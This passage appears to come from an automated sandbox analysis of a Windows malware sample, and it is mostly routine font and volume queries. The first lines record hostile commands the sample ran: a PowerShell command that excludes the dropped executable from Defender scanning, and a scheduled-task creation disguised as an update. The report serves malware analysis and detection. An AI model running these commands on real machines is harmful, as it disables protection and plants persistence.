        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LYKZypsugb.exe
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LYKZypsugb" /XML "C:\Users\user\AppData\Local\Temp\tmpFF8.tmp
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
        Source: U7Ncg7oAyC.exe, 00000006.00000002.519112571.0000000002E77000.00000004.00000800.00020000.00000000.sdmp, U7Ncg7oAyC.exe, 00000006.00000002.517682575.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, U7Ncg7oAyC.exe, 00000006.00000002.517867375.0000000002B35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
        Source: U7Ncg7oAyC.exe, 00000006.00000002.521213475.000000000605C000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: Program ManagerlT
        Source: U7Ncg7oAyC.exe, 00000006.00000002.521628763.0000000006D7C000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: Program Managerlt
        Source: U7Ncg7oAyC.exe, 00000006.00000002.517929378.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, U7Ncg7oAyC.exe, 00000006.00000002.518844326.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, U7Ncg7oAyC.exe, 00000006.00000002.519038098.0000000002E53000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerL@
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Users\user\Desktop\U7Ncg7oAyC.exe VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
